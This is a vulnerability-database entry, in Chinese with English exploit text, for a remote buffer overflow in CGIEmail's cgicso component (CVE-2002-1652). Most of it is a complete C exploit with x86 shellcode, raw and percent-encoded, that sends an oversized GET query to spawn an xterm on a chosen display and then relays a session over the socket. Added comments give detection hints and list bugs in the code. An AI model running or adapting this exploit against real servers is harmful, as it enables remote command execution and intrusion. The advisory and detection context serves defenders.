CGIEmail远程缓冲区溢出漏洞
漏洞ID | 1106486 | 漏洞类型 | 边界条件错误 |
发布时间 | 2001-09-11 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2002-1652 |
CNNVD-ID | CNNVD-200212-873 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
CGIEmail是一款基于WEB的邮件处理系统。CGIEmail中的cgicso.c程序对用户提交的查询内容缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,可以以WEB权限执行任意指令。cgicso.c程序对query参数的内容缺少充分检查,攻击者提交超长的字符串作为query参数内容,可触发缓冲区溢出,精心构建提交的字符串可能以WEB进程的权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6141/info
A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts.
A remotely exploitable buffer overflow has been discovered in a component included with CGIEmail. By sending a maliciously constructed GET request to the vulnerable server, it is possible for a remote attacker to overrun a buffer, potentially resulting in the execution of arbitrary system commands with the privileges of the mail server.
/*
* cso.c (06/30/01)
*
* Remote exploit for cgicso included with cgiemail 1.6
* Tested on Slackware Linux 7.1 running Apache 1.3.20
* Spawns an xterm on your display.
*
*
* Note: In order to exploit, cgicso must be compiled with
* CGI_CSO_HARDCODE undefined, otherwise it will bypass
* the exploitable portion of code.
*
*
* Exploit By: isox of hhp. ([email protected])
* Site: www.hhp-programming.net && 0xc0ffee.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define RET 0xbfffe208 // Slackware 7.1.0
#define LEN 2038
#define PORT 80
/* Used only for its length: main() computes strlen(code) - strlen(noncode)
 * when sizing the request buffer. This string is never sent. */
char noncode[] =
"xebx4fx5ex31xd2x88x56x14x88x56x18x88x56x21xb2x2b"
"x31xc9xb1x09x80x3cx32x4bx74x05x42xe2xf7xebx2bx88"
"x34x32x31xd2x89xf3x89x76x36x8dx7ex15x89x7ex3ax8d"
"x7ex19x89x7ex3ex8dx7ex22x89x7ex42x89x56x46x8dx4e"
"x36x8dx56x46x31xc0xb0x0bxcdx80x31xdbx89xd8x40xcd"
"x80xe8xacxffxffxff"
"/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K";
/* Percent-encoded payload that main() copies verbatim into the "query="
 * parameter of the GET request. As a detection signature this is the literal
 * text that appears on the wire: a long run of %xx escapes immediately after
 * "query=AAA" in a request for /cgi-bin/cgicso. */
char code[] =
"%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c"
"%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15"
"%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d"
"%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75"
"%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74"
"%38%2d%64%69%73%70%6c%61%79%38"
"%31%32%37%2e%30%2e%30%2e%31" // percent-encoded "127.0.0.1"
"%3a%30%4b";
/*
 * Entry point. Builds a single HTTP GET for /cgi-bin/cgicso whose "query="
 * parameter is padded to LEN bytes, sends it to argv[1]:PORT, and optionally
 * drops into initstream() to relay stdin/stdout over the same socket.
 *
 * argv[1]  host name or dotted-quad address
 * argv[2]  optional decimal offset subtracted from RET (parsed with atoi,
 *          no validation)
 * argv[3]  "--debug" or "-d" to enable the interactive relay after sending
 *
 * Defender's view: the observable artefact is one GET to /cgi-bin/cgicso
 * carrying a query parameter of roughly LEN (2038) bytes, mostly %xx escapes
 * followed by a repeated 4-byte value. Bounding the accepted query length in
 * the CGI, or alerting on oversized query strings for that path, catches it.
 *
 * Review notes (the file is kept as-is here):
 *  - strlen/strcat/memcpy need <string.h>, inet_addr needs <arpa/inet.h>;
 *    neither is included above, and initstream() is used before it is
 *    declared, so this does not build under C99+ without edits.
 *  - malloc() result is not checked; the socket descriptor and send() result
 *    are not checked either.
 *  - struct sockaddr_in s is never zeroed before use.
 */
int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address=RET;
/* diff is the extra space the percent-encoded form takes over the raw
 * bytes; it only feeds the buffer-size arithmetic below. */
int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0;
struct hostent *t;
struct sockaddr_in s;
if(argc < 2) {
fprintf(stderr, "usage: %s <host> [offset [--debug]]n", argv[0]);
exit(-1);
}
if(argc > 2)
address -= atoi(argv[2]);
if(argc > 3) {
if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d")))
debug = 1;
}
fprintf(stderr, "Using Address: 0x%lxn", address);
/* 42 bytes are written by hand below, then strlen(code) bytes, then
 * (LEN - strlen(code) + diff) bytes of address words rounded up to a
 * multiple of 4, then "nn" and a terminator; the allocation does not
 * account for the rounding, so it can be short by up to 3 bytes. */
buf = (char *)malloc(44 + LEN + diff + 1);
p = buf;
/* Request line and path, one character at a time: "GET /cgi-bin/cgicso?" */
(*p++) = 'G';
(*p++) = 'E';
(*p++) = 'T';
(*p++) = ' ';
(*p++) = '/';
(*p++) = 'c';
(*p++) = 'g';
(*p++) = 'i';
(*p++) = '-';
(*p++) = 'b';
(*p++) = 'i';
(*p++) = 'n';
(*p++) = '/';
(*p++) = 'c';
(*p++) = 'g';
(*p++) = 'i';
(*p++) = 'c';
(*p++) = 's';
(*p++) = 'o';
(*p++) = '?';
/* "fingerhost=A&" */
(*p++) = 'f';
(*p++) = 'i';
(*p++) = 'n';
(*p++) = 'g';
(*p++) = 'e';
(*p++) = 'r';
(*p++) = 'h';
(*p++) = 'o';
(*p++) = 's';
(*p++) = 't';
(*p++) = '=';
(*p++) = 'A'; // Yes this should be an A
(*p++) = '&';
/* "query=AAA" -- the parameter the CGI copies without a length check */
(*p++) = 'q';
(*p++) = 'u';
(*p++) = 'e';
(*p++) = 'r';
(*p++) = 'y';
(*p++) = '=';
(*p++) = 'A'; // Yes this should be an A
(*p++) = 'A'; // Yes this should be an A
(*p++) = 'A'; // Yes this should be an A
for(i=0; i<strlen(code); i++)
(*p++) = code[i];
/* Pad the rest of the parameter with the chosen address. The loop steps by
 * 4 but stores a long, so the two agree only where sizeof(long) == 4; on
 * an LP64 host the stores overrun the intended region and the upper zero
 * bytes of each long act as string terminators. */
addressp = (long *)p;
for(i=0; i<(LEN - strlen(code)) + diff; i+=4)
(*addressp++) = address;
/* Nothing above wrote a NUL terminator, so strcat() scans from buf through
 * whatever malloc() left beyond the filled region -- undefined behaviour;
 * where the "nn" lands depends on that memory. */
strcat(buf, "nn");
fprintf(stderr, "Using length: %dn", strlen(buf));
/*
 * Connect. Assignment inside the condition: inet_addr() returns a nonzero
 * value both for a valid address and for failure (INADDR_NONE), so the
 * gethostbyname() branch runs for almost any input and performs the real
 * resolution.
 */
if(s.sin_addr.s_addr=inet_addr(argv[1])) {
if(!(t=gethostbyname(argv[1]))) {
printf("Connection Failed.n");
exit(-1);
}
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
s.sin_family=AF_INET;
s.sin_port=htons(PORT);
sock=socket(AF_INET,SOCK_STREAM,0);
if(connect(sock,(struct sockaddr*)&s,sizeof(s))) {
fprintf(stderr, "Connection failed.n");
exit(-1);
}
fprintf(stderr, "done.n");
fprintf(stderr, "Sending buffer... ");
send(sock, buf, strlen(buf), 0);
fprintf(stderr, "done.n");
sleep(2);
/* Optional interactive relay on the same socket (defined below, no
 * prototype above -- implicit declaration). */
if(debug == 1) {
fprintf(stderr, "Entering Debug Mode... n");
initstream(sock);
}
close(sock);
free(buf);
exit(0);
}
/*
 * Relay loop: multiplexes the socket and stdin with select(), printing
 * whatever the peer sends and forwarding whatever is typed. Only returns
 * via exit() when the peer closes; the trailing "return;" carries no value
 * despite the int return type.
 *
 * sock  connected TCP socket
 *
 * Review notes: read() is asked for the full 1024 bytes and the result is
 * then used as an index (recvbuf[n] = 0), which writes one past the array
 * when a read fills it; select() and write() results are not checked.
 */
int initstream(int sock) {
int n;
char recvbuf[1024];
fd_set rset;
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset)) {
/* 0 means orderly close by the peer, <0 an error; both end the relay. */
if((n=read(sock,recvbuf,1024)) <= 0) {
printf("Connection closed by foreign host.n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset)) {
if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
recvbuf[n]=0;
write(sock,recvbuf,n);
}
}
}
return;
}
|参考资料
来源:US-CERTVulnerabilityNote:VU#185251
名称:VU#185251
链接:http://www.kb.cert.org/vuls/id/185251
来源:XF
名称:cgiemail-cgicso-get-bo(10595)
链接:http://xforce.iss.net/xforce/xfdb/10595
来源:BID
名称:6141
链接:http://www.securityfocus.com/bid/6141
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/5TP0W005FE.html
来源:SECTRACK
名称:1002395
链接:http://securitytracker.com/id?1002395
来源:NSFOCUS
名称:3812
链接:http://www.nsfocus.net/vulndb/3812